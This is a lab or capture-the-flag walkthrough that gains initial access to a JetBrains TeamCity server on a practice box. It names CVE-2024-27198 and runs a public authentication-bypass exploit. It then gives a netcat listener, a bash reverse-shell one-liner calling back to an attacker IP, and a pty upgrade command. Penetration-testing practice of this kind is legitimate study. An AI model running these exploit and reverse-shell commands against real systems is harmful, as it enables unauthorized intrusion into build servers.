http

At port 80.

In the useful link, It is revealed that login page is in other vhost.

let's add this to hosts file.

echo "$scrutiny onlyrands.com" | sudo tee -a /etc/hosts && echo "$scrutiny teams.onlyrands.com" | sudo tee -a /etc/hosts

Then try to access the host.

Found version related information of TeamCity.

Doing Search reveal RCE exploit.

JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)Exploit Database

This is not exploitable by above code.

This is version JetBrains TeamCity 2023.05.4 it has been fix in this version.

Checking Reset link:

It is asking for user email id. But we dont have it.

Working Exploit

I found one exploit related to TeamCity before the 2023.11.4. This means the version is also vulnerable.

TeamCity Auth bypass to RCE (CVE-2024-27198 and CVE-2024-27199) - vsocietywww.vicarius.io

GitHub - Chocapikk/CVE-2024-27198: Proof of Concept for Authentication Bypass in JetBrains TeamCity Pre-2023.11.4GitHub

I will be using above exploit and not one which is mentioned in Explaination.

Follow the exploit.

# Clone the repo
git clone https://github.com/Chocapikk/CVE-2024-27198.git

# Get into its folder
cd CVE-2024-27198

# Install requirements
temp_env  # My custom script to make env temp
pip install -r requirements.txt

# Run the exploit
python3 exploit.py -u http://teams.onlyrands.com --add-user --payload-type linux

I changed the shell from sh to bash.

If fails in the first try then run again. It will work.

Then, I reran the command and got the shell.

Now run the bash reverse shell to get the shell.

sudo rlwrap -cAr nc -lnvp 80

bash -c "bash -i >& /dev/tcp/192.168.45.244/80 0>&1"

This is showing error but in the listener I got the shell.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

PreviousScrutiny [V. hard]Nextprivilege escalation

Last updated 11 months ago

Was this helpful?

hashtagWorking Exploit

Working Exploit